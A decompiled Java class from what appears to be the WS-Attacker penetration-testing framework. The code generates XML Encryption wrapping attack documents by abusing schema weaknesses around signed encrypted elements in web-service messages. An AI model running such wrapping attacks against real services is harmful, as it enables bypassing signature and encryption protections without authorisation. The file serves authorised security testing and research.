/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles;

import java.util.ArrayList;
import java.util.List;
import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import wsattacker.library.schemaanalyzer.SchemaAnalyzer;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.WrappingOracleIF;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.util.WrapOracleHelper;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractEncryptionWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.EncryptionSchemaWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.FactoryWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.WeaknessType;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionmanager.DetectFilterEnum;
import wsattacker.library.xmlencryptionattack.detectionengine.detectionstreams.DetectionReport;
import wsattacker.library.xmlencryptionattack.detectionengine.filter.info.SignatureInfo;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractEncryptionElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractRefElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.ElementAttackProperties;
import wsattacker.library.xmlencryptionattack.encryptedelements.data.EncryptedDataElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.DataReferenceElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.KeyReferenceElement;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class EncryptionWrappingOracle
implements WrappingOracleIF {
    private final Document m_OriginalDocument;
    private int m_MaxPossibilites;
    private final List<AbstractEncryptionWeakness> m_EncryptionWeakness = new ArrayList<AbstractEncryptionWeakness>();
    private final AbstractEncryptionElement m_EncPay;
    private final ElementAttackProperties m_EncPayAttackProp;
    public static final Logger LOG = Logger.getLogger(EncryptionWrappingOracle.class);
    private final SchemaAnalyzer m_SchemaAnalyzer;

    public EncryptionWrappingOracle(AbstractEncryptionElement encPay, DetectionReport detRep, SchemaAnalyzer schemaAnalyser) throws InvalidWeaknessException {
        SignatureInfo sigInfo = (SignatureInfo)detRep.getDetectionInfo(DetectFilterEnum.SIGNATUREFILTER);
        this.m_OriginalDocument = detRep.getRawFile();
        this.m_EncPay = encPay;
        this.m_MaxPossibilites = 0;
        this.m_SchemaAnalyzer = schemaAnalyser;
        if (null == this.m_EncPay) {
            LOG.error((Object)"Error: No encryption element detected in EncWrappingOracle");
        }
        this.m_EncPayAttackProp = this.m_EncPay.getAttackProperties();
        if (null == this.m_EncPayAttackProp) {
            LOG.error((Object)"Error: No Attack Properties set for Payload in EncryptionWrappingOracle");
        }
        if (!sigInfo.isSignature()) {
            LOG.info((Object)"No signature detected");
        }
        this.initEncPayWeaknesses();
    }

    private void initEncPayWeaknesses() throws IllegalArgumentException, InvalidWeaknessException {
        if (this.m_EncPay instanceof EncryptedKeyElement) {
            int idxEncDataPay = ((EncryptedKeyElement)this.m_EncPay).getWrappingEncDataIndex();
            List<AbstractRefElement> encRefs = ((EncryptedKeyElement)this.m_EncPay).getReferenceElementList();
            if (encRefs.get(idxEncDataPay) instanceof DataReferenceElement) {
                EncryptedDataElement encDataRef = ((DataReferenceElement)encRefs.get(idxEncDataPay)).getRefEncData();
                ElementAttackProperties attackProps = encDataRef.getAttackProperties();
                if (attackProps.isSigned() || attackProps.isAdditionalWrap()) {
                    this.setEncryptionSchemaWeakness(encDataRef, (EncryptedKeyElement)this.m_EncPay);
                }
            } else if (encRefs.get(idxEncDataPay) instanceof KeyReferenceElement) {
                throw new IllegalArgumentException("keyreference not supported yet!");
            }
            if (this.m_EncPayAttackProp.isSigned() || this.m_EncPayAttackProp.isAdditionalWrap()) {
                this.setEncryptionSchemaWeakness((EncryptedKeyElement)this.m_EncPay, (EncryptedKeyElement)this.m_EncPay);
            }
        } else {
            this.initWeaknessesOfEncDataOnly();
        }
    }

    private void initWeaknessesOfEncDataOnly() throws IllegalArgumentException, InvalidWeaknessException {
        if (this.m_EncPay instanceof EncryptedDataElement) {
            if (this.m_EncPayAttackProp.isSigned() || this.m_EncPayAttackProp.isAdditionalWrap()) {
                this.setEncryptionSchemaWeakness(this.m_EncPay, null);
                LOG.info((Object)"Signed EncData without EncKey detected.");
            }
        } else {
            throw new IllegalArgumentException("No valid EncryptionElement!");
        }
    }

    final void setEncryptionSchemaWeakness(AbstractEncryptionElement encPay, EncryptedKeyElement encKey) throws InvalidWeaknessException {
        EncryptionSchemaWeakness encSchemWeak = (EncryptionSchemaWeakness)FactoryWeakness.generateWeakness(WeaknessType.SCHEMA_WEAKNESS, encPay, encKey);
        encSchemWeak.findSchemaWeakness(this.m_SchemaAnalyzer);
        this.setMaxPossibilites(encSchemWeak.getPossibleNumWeaks(), encPay.getEncryptedElement());
        this.m_EncryptionWeakness.add(encSchemWeak);
    }

    @Override
    public int maxPossibilities() {
        return this.m_MaxPossibilites;
    }

    private void setMaxPossibilites(int numberOfPossibilites, Element payElement) {
        if (numberOfPossibilites > 0) {
            this.m_MaxPossibilites = this.m_MaxPossibilites == 0 ? numberOfPossibilites : this.m_MaxPossibilites * numberOfPossibilites;
        } else {
            LOG.info((Object)("No Extensionpoints for " + payElement.getNodeName() + " detected / Skipping."));
        }
    }

    @Override
    public Document getPossibility(int index) throws InvalidWeaknessException {
        WeaknessLog.clean();
        LOG.info((Object)("Creating Wrapping Possibility " + index + " of (" + this.m_MaxPossibilites + "-1)"));
        Document attackDocument = DomUtilities.createNewDomFromNode((Node)this.m_OriginalDocument.getDocumentElement());
        int weakPropIdx = 0;
        int currIdx = index;
        Element encKeyPay = null;
        if (this.m_EncPay instanceof EncryptedKeyElement) {
            int idxEncDataPay = ((EncryptedKeyElement)this.m_EncPay).getWrappingEncDataIndex();
            List<AbstractRefElement> encRefs = ((EncryptedKeyElement)this.m_EncPay).getReferenceElementList();
            if (encRefs.get(idxEncDataPay) instanceof DataReferenceElement) {
                EncryptedDataElement encDataRef = ((DataReferenceElement)encRefs.get(idxEncDataPay)).getRefEncData();
                ElementAttackProperties attackProps = encDataRef.getAttackProperties();
                if (attackProps.isSigned() || attackProps.isAdditionalWrap()) {
                    int possibility = index % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                    index /= this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                    Element payElement = null;
                    try {
                        payElement = (Element)attackDocument.importNode(attackProps.getWrappingPayloadElement(), true);
                        attackProps.setAttackPayloadElement(payElement);
                        encKeyPay = this.m_EncPayAttackProp.isSigned() || this.m_EncPayAttackProp.isAdditionalWrap() ? (Element)attackDocument.importNode(this.m_EncPayAttackProp.getWrappingPayloadElement(), true) : DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)this.m_EncPay.getEncryptedElement());
                        this.m_EncPayAttackProp.setAttackPayloadElement(encKeyPay);
                    }
                    catch (Exception e) {
                        LOG.error((Object)("Could not get Payload Element for " + payElement.getNodeName() + " / Skipping."));
                    }
                    this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, encKeyPay, payElement);
                    LOG.info((Object)String.format(payElement.getLocalName() + ": Wrapper @ %s", DomUtilities.getFastXPath((Node)payElement)));
                    ++weakPropIdx;
                } else if (encRefs.get(idxEncDataPay) instanceof KeyReferenceElement) {
                    throw new IllegalArgumentException("keyreference not supported yet!");
                }
            }
            if (this.m_EncPayAttackProp.isSigned() || this.m_EncPayAttackProp.isAdditionalWrap()) {
                int possibility = index % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                index /= this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
                if (null == encKeyPay) {
                    try {
                        encKeyPay = (Element)attackDocument.importNode(this.m_EncPayAttackProp.getWrappingPayloadElement(), true);
                        this.m_EncPayAttackProp.setAttackPayloadElement(encKeyPay);
                    }
                    catch (Exception e) {
                        LOG.error((Object)("Could not get Payload Element for " + encKeyPay.getNodeName() + " / Skipping."));
                    }
                }
                this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, null, encKeyPay);
                LOG.info((Object)String.format(encKeyPay.getLocalName() + ": Wrapper @ %s", DomUtilities.getFastXPath((Node)encKeyPay)));
                ++weakPropIdx;
            }
        }
        weakPropIdx = this.handleEncDataOnly(index, weakPropIdx, attackDocument);
        this.handleAdditionalWeaknesses(currIdx, weakPropIdx);
        return attackDocument;
    }

    private int handleEncDataOnly(int index, int weakPropIdx, Document attackDocument) throws IllegalArgumentException {
        Element payElement = null;
        if (this.m_EncPay instanceof EncryptedDataElement && (this.m_EncPayAttackProp.isSigned() || this.m_EncPayAttackProp.isAdditionalWrap())) {
            int possibility = index % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
            index /= this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
            try {
                payElement = (Element)attackDocument.importNode(this.m_EncPayAttackProp.getWrappingPayloadElement(), true);
                this.m_EncPayAttackProp.setAttackPayloadElement(payElement);
                WrapOracleHelper.handleEncKeyInEncData((EncryptedDataElement)this.m_EncPay);
            }
            catch (Exception e) {
                LOG.error((Object)("Could not get Payload Element for " + payElement.getNodeName() + " / Skipping."));
            }
            this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, null, payElement);
            LOG.info((Object)String.format(payElement.getLocalName() + ": Wrapper @ %s", DomUtilities.getFastXPath((Node)payElement)));
            ++weakPropIdx;
        }
        return weakPropIdx;
    }

    @Override
    public void addAdditionalEncryptionWeakness(AbstractEncryptionWeakness addWeak) {
        int weaknessSize = this.m_EncryptionWeakness.size();
        this.m_EncryptionWeakness.add(addWeak);
        this.setMaxPossibilites(this.m_EncryptionWeakness.get(weaknessSize).getPossibleNumWeaks(), this.m_EncPay.getAttackProperties().getWrappingPayloadElement());
    }

    private void handleAdditionalWeaknesses(int index, int weakPropIdx) {
        if (1 < this.m_EncryptionWeakness.size() && this.m_EncryptionWeakness.size() > weakPropIdx) {
            int possibility = (index /= this.m_EncryptionWeakness.get(weakPropIdx - 1).getPossibleNumWeaks()) % this.m_EncryptionWeakness.get(weakPropIdx).getPossibleNumWeaks();
            if (this.m_EncPay instanceof EncryptedDataElement) {
                this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, null, this.m_EncPay.getAttackProperties().getAttackPayloadElement());
            } else if (this.m_EncPay instanceof EncryptedKeyElement) {
                int idxEncDataPay = ((EncryptedKeyElement)this.m_EncPay).getWrappingEncDataIndex();
                List<AbstractRefElement> encRefs = ((EncryptedKeyElement)this.m_EncPay).getReferenceElementList();
                EncryptedDataElement encDataRef = ((DataReferenceElement)encRefs.get(idxEncDataPay)).getRefEncData();
                this.m_EncryptionWeakness.get(weakPropIdx).abuseWeakness(possibility, this.m_EncPay.getAttackProperties().getAttackPayloadElement(), encDataRef.getAttackProperties().getAttackPayloadElement());
            }
            ++weakPropIdx;
        }
    }
}

